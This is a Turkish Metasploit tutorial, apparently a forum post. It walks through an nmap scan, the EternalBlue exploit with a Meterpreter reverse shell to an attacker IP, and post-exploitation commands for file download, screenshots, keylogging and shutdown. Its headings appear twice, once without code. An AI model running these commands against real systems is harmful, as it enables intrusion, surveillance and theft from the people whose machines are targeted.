Metasploit, sistem açıklarını tespit etmek, test etmek ve sömürmek için kullanılan güçlü bir çerçevedir. İçerisinde çeşitli araçlar ve exploit'ler barındırır. Kali Linux gibi siber güvenlik dağıtımlarında hazır olarak gelir.
Metasploit'i Çalıştırma ve Başlangıç Adımları
Bu komut, Metasploit'in ana konsolunu başlatır.
Hedef Sistemi Tarama
Metasploit ile bir hedef sistemi taramak için nmap kullanılabilir:
Çıktıda, hedef sistemde açık olan portlar ve çalışan servisler gösterilir.
Exploit Seçimi
Hedef sistemde açık olduğu tespit edilen bir servis için exploit seçilir:
Örnek:
Payload Seçimi
Payload, hedef sistemde çalıştırılacak zararlı kodu ifade eder:
Örnek:
Gerekli Parametrelerin Ayarlanması
Hedef IP ve saldırganın IP bilgileri (LHOST, RHOST gibi) ayarlanır:
Exploit'in Çalıştırılması
Ayarlar yapıldıktan sonra exploit başlatılır:
veya
------------------------------------------------------------------------------------------------------------------
Bilgi toplama
Dosya Yönetimi
Ekran Görüntüsü Alma
Klavye Dinleme (Keylogger)
Hedef Sistemi Kapatma veya Yeniden Başlatma
-------------------------------------------------------------------------------------------------------
Kullanılabilir exploit veya payload'ları bulmak için:
Örnek:
Seçilen Modülün Detaylarını Görme
Modül hakkında bilgi almak için:
Ayarları Listeleme
Seçilen exploit veya payload için ayarları görmek:
Tüm Exploit ve Payload'ları Görüntüleme
Metasploit'i Çalıştırma ve Başlangıç Adımları
Kod:
msfconsole
Hedef Sistemi Tarama
Metasploit ile bir hedef sistemi taramak için nmap kullanılabilir:
Kod:
nmap -sV -p 1-1000 <hedef_ip>
Exploit Seçimi
Hedef sistemde açık olduğu tespit edilen bir servis için exploit seçilir:
Kod:
use exploit/<exploit_yolu>
Kod:
use exploit/windows/smb/ms17_010_eternalblue
Payload Seçimi
Payload, hedef sistemde çalıştırılacak zararlı kodu ifade eder:
Kod:
set payload <payload_ismi>
Kod:
set payload windows/meterpreter/reverse_tcp
Gerekli Parametrelerin Ayarlanması
Hedef IP ve saldırganın IP bilgileri (LHOST, RHOST gibi) ayarlanır:
Kod:
set RHOST <hedef_ip>
set LHOST <saldırgan_ip>
set LPORT 4444
Exploit'in Çalıştırılması
Ayarlar yapıldıktan sonra exploit başlatılır:
Kod:
exploit
Kod:
run
Meterpreter Komutları
Hedef sistemde başarıyla oturum açıldıktan sonra Meterpreter kullanılabilir:Bilgi toplama
Kod:
sysinfo # Sistem bilgilerini gösterir
getuid # Geçerli kullanıcı adını gösterir
Dosya Yönetimi
Kod:
ls # Dosyaları listeler
cd <dizin> # Dizin değiştirir
download <dosya> # Dosya indirir
upload <dosya> # Dosya yükler
Ekran Görüntüsü Alma
Kod:
screenshot
Klavye Dinleme (Keylogger)
Kod:
keyscan_start # Keylogger başlatır
keyscan_dump # Toplanan tuş vuruşlarını gösterir
Hedef Sistemi Kapatma veya Yeniden Başlatma
Kod:
shutdown # Sistemi kapatır
reboot # Sistemi yeniden başlatır
-------------------------------------------------------------------------------------------------------
Kullanışlı Komutlar
Modülleri AraştırmaKullanılabilir exploit veya payload'ları bulmak için:
Kod:
search <anahtar_kelime>
Kod:
search eternalblue
Seçilen Modülün Detaylarını Görme
Modül hakkında bilgi almak için:
Kod:
info
Ayarları Listeleme
Seçilen exploit veya payload için ayarları görmek:
Kod:
show options
Tüm Exploit ve Payload'ları Görüntüleme
Kod:
show exploits
show payloads